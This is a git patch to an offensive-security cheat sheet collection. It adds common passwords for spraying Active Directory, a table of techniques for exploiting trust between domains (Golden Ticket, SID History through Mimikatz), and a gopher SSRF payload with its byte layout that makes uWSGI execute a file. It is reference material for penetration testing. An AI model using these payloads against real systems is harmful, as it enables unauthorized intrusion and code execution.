From 71171fa78bb344d252c55b6d013f3054a83c9a91 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 5 Jan 2020 22:11:28 +0100 Subject: [PATCH] SSRF exploiting WSGI --- .../Active Directory Attack.md | 33 ++++++++++++++++--- Server Side Request Forgery/README.md | 23 +++++++++++++ 2 files changed, 52 insertions(+), 4 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 31265dec..0ec49c36 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -540,10 +540,10 @@ Password spraying refers to the attack method that takes a large number of usern Most of the time the best passwords to spray are : -- Password123 -- Welcome1 +- Password123, mimikatz +- Welcome1/Welcome01 - $Companyname1 : $Microsoft1 -- SeasonYear : Winter2019* +- SeasonYear : Winter2019*,Spring2020!,Summer2018? - Default AD password with simple mutations such as number-1, special character iteration (*,?,!,#) #### Kerberos pre-auth bruteforcing @@ -1033,6 +1033,17 @@ ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtr ### Trust relationship between domains +* One-way + * Domain B trusts A + * Users in Domain A can access resources in Domain B + * Users in Domain B cannot access resources in Domain A +* Two-way + * Domain A trusts Domain B + * Domain B trusts Domain A + * Authentication requests can be passed between the two domains in both directions + +#### Enumerate trusts between domains + ```powershell nltest /trusted_domains ``` @@ -1047,6 +1058,19 @@ SourceName TargetName TrustType TrustDirection domainA.local domainB.local TreeRoot Bidirectional ``` +#### Exploit trusts between domains + +:warning: Require a Domain-Admin level access to the current domain. + +| Source | Target | Technique to use | Trust relationship | +|---|---|---|---| +| Root | Child | Golden Ticket + Enterprise Admin group (Mimikatz /groups) | Inter Realm (2-way) | +| Child | Child | SID History exploitation (Mimikatz /sids) | Inter Realm Parent-Child (2-way) | +| Child | Root | SID History exploitation (Mimikatz /sids) | Inter Realm Tree-Root (2-way) | +| Forest A | Forest B | PrinterBug + Unconstrained delegation ? | Inter Realm Forest or External (2-way) | + + + ### Child Domain to Forest Compromise - SID Hijacking Most trees are linked with dual sided trust relationships to allow for sharing of resources. @@ -1498,4 +1522,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5 * [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https:/www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/) * [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX](pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/) * [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/) -* [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179) \ No newline at end of file +* [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179) +* [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0) \ No newline at end of file diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 88e7db0f..46cb2f3b 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -29,6 +29,7 @@ * [ldap://](#ldap) * [gopher://](#gopher) * [netdoc://](#netdoc) +* [SSRF exploiting WSGI](#ssrf-exploiting-wsgi) * [SSRF to XSS](#ssrf-to-xss) * [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances) * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket) @@ -355,6 +356,28 @@ Wrapper for Java when your payloads struggle with "\n" and "\r" characters. ssrf.php?url=gopher://127.0.0.1:4242/DATA ``` +## SSRF exploiting WSGI + +Exploit using the Gopher protocol, full exploit script available at https://github.com/wofeiwo/webcgi-exploits/blob/master/python/uwsgi_exp.py. + +```powershell +gopher://localhost:8000/_%00%1A%00%00%0A%00UWSGI_FILE%0C%00/tmp/test.py +``` + +| Header | | | +|-----------|-----------|-------------| +| modifier1 | (1 byte) | 0 (%00) | +| datasize | (2 bytes) | 26 (%1A%00) | +| modifier2 | (1 byte) | 0 (%00) | + +| Variable (UWSGI_FILE) | | | | | +|-----------------------|-----------|----|------------|---| +| key length | (2 bytes) | 10 | (%0A%00) | | +| key data | (m bytes) | | UWSGI_FILE | | +| value length | (2 bytes) | 12 | (%0C%00) | | +| value data | (n bytes) | | /tmp/test.py | | + + ## SSRF to XSS by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)